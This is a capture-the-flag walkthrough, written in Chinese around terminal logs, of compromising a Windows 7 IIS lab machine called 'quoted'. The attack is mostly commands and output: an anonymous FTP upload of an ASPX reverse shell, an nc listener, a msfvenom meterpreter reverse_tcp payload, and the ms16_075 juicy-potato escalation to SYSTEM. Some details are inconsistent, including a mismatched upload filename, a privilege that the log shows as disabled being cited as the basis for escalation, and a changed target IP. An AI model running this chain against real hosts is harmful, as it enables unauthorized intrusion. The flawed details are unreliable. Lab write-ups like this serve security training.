┌──(root㉿kali)-[/home/kali/hmv/ysnmrtksk]
└─# fscan -h 192.168.56.21
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.56.21:135 open
192.168.56.21:21 open
192.168.56.21:139 open
192.168.56.21:445 open
192.168.56.21:80 open
[*] alive ports len is: 5
start vulscan
[*] NetInfo
[*]192.168.56.21
[->]quoted-PC
[->]192.168.56.21
[*] OsInfo 192.168.56.21 (Windows 7 Professional 7601 Service Pack 1)
[+] ftp 192.168.56.21:21:anonymous
[->]aspnet_client
[->]iisstart.htm
[->]welcome.png
[*] WebTitle http://192.168.56.21 code:200 len:689 title:IIS7
已完成 5/5
[*] 扫描结束,耗时: 1.434643461s
┌──(root㉿kali)-[/home/kali/hmv/quoted]
└─# ftp 192.168.56.21
Connected to 192.168.56.21.
220 Microsoft FTP Service
Name (192.168.56.21:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49179|)
125 Data connection already open; Transfer starting.
10-05-24 11:16AM <DIR> aspnet_client
10-04-24 11:27PM 689 iisstart.htm
10-04-24 11:27PM 184946 welcome.png
226 Transfer complete.
ftp> put shell.aspx
local: pass.asp remote: pass.asp
229 Entering Extended Passive Mode (|||49181|)
125 Data connection already open; Transfer starting.
100% |******************************************************| 27 432.24 KiB/s --:-- ETA
下一个aspx马
https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
改下ip监听端口 Put上去
然后弹shell
┌──(root㉿kali)-[/home/kali/hmv/quoted]
└─# ftp 192.168.56.21
Connected to 192.168.56.21.
220 Microsoft FTP Service
Name (192.168.56.21:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49185|)
125 Data connection already open; Transfer starting.
100% |******************************************************| 16394 87.34 MiB/s --:-- ETA
226 Transfer complete.
16394 bytes sent in 00:00 (18.90 MiB/s)
ftp> exit
221 Goodbye.
┌──(root㉿kali)-[/home/kali/hmv/quoted]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.56.6] from (UNKNOWN) [192.168.56.21] 49186
Spawn Shell...
Microsoft Windows [S▒r▒m 6.1.7601]
Telif Hakk▒ (c) 2009 Microsoft Corporation. T▒m haklar▒ sakl▒d▒r.
c:\windows\system32\inetsrv>hostname
hostname
quoted-PC
c:\windows\system32\inetsrv>
我们利用msf进行提权即可。
先把shell转给msf
用msf生成一个反向shell
┌──(root㉿kali)-[/home/kali/hmv/quoted]
└─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.6 lport=7788 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
上传这个反向shell到靶机
┌──(root㉿kali)-[/home/kali/hmv/quoted]
└─# ftp 192.168.56.21
Connected to 192.168.56.21.
220 Microsoft FTP Service
Name (192.168.56.21:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.exe
local: shell.exe remote: shell.exe
229 Entering Extended Passive Mode (|||49191|)
125 Data connection already open; Transfer starting.
100% |***********************************************| 74160 48.84 MiB/s --:-- ETA
226 Transfer complete.
74160 bytes sent in 00:00 (38.22 MiB/s)
msf开启监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.6
set lport 7788
run
meterpreter > shell
Process 2040 created.
Channel 3 created.
Microsoft Windows [S▒r▒m 6.1.7601]
Telif Hakk▒ (c) 2009 Microsoft Corporation. T▒m haklar▒ sakl▒d▒r.
c:\Windows\Tasks>whoami /priv
whoami /priv
AYRICALIK B▒LG▒LER▒
----------------------
Ayr▒cal▒k Ad▒ A▒▒klama Durum
============================= ======================================================== ==========
SeAssignPrimaryTokenPrivilege ▒▒lem d▒zeyi belirtecini de▒i▒tir Devre D▒▒▒
SeIncreaseQuotaPrivilege ▒▒lem i▒in bellek kotalar▒ ayarla Devre D▒▒▒
SeSecurityPrivilege Denetimi ve g▒venlik g▒nl▒▒▒n▒ y▒net Devre D▒▒▒
SeShutdownPrivilege Sistemi kapat Devre D▒▒▒
SeAuditPrivilege G▒venlik denetimleri olu▒tur Devre D▒▒▒
SeChangeNotifyPrivilege ▒apraz ge▒i▒ denetimini atla Etkin
SeUndockPrivilege Bilgisayar▒ takma biriminden ▒▒kar Devre D▒▒▒
SeImpersonatePrivilege Kimlik do▒rulamas▒ndan sonra istemcinin ▒zelliklerini al Etkin
SeCreateGlobalPrivilege Genel nesneler olu▒tur Etkin
SeIncreaseWorkingSetPrivilege ▒▒lem ▒al▒▒ma k▒mesini art▒r Devre D▒▒▒
SeTimeZonePrivilege Saat dilimini de▒i▒tir Devre D▒▒▒
发现具有 SeIncreaseWorkingSetPrivilege 权限
直接用 GodPotato 或者 juicyPotao 提权即可
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
set lhost 192.168.56.6
set lport 7788
run
msf6 exploit(windows/local/ms16_075_reflection_juicy) > run
[*] Started reverse TCP handler on 192.168.56.6:7788
[+] Target appears to be vulnerable (Windows 7 Service Pack 1)
[*] Launching notepad to host the exploit...
[+] Process 1240 launched.
[*] Reflectively injecting the exploit DLL into 1240...
[*] Injecting exploit into 1240...
[*] Exploit injected. Injecting exploit configuration into 1240...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176198 bytes) to 192.168.56.24
[*] Meterpreter session 2 opened (192.168.56.6:7788 -> 192.168.56.24:49194) at 2024-12-24 07:48:21 -0500
meterpreter > shell
Process 2240 created.
Channel 1 created.
Microsoft Windows [S▒r▒m 6.1.7601]
Telif Hakk▒ (c) 2009 Microsoft Corporation. T▒m haklar▒ sakl▒d▒r.
C:\Windows\system32>whoami
whoami
nt authority\system
c:\Users\Administrator\Desktop>type root.txt
type root.txt
HMV{Elevated_Shell_Again}
c:\Users\quoted\Desktop>type user.txt
type user.txt
HMV{User_Flag_Obtained}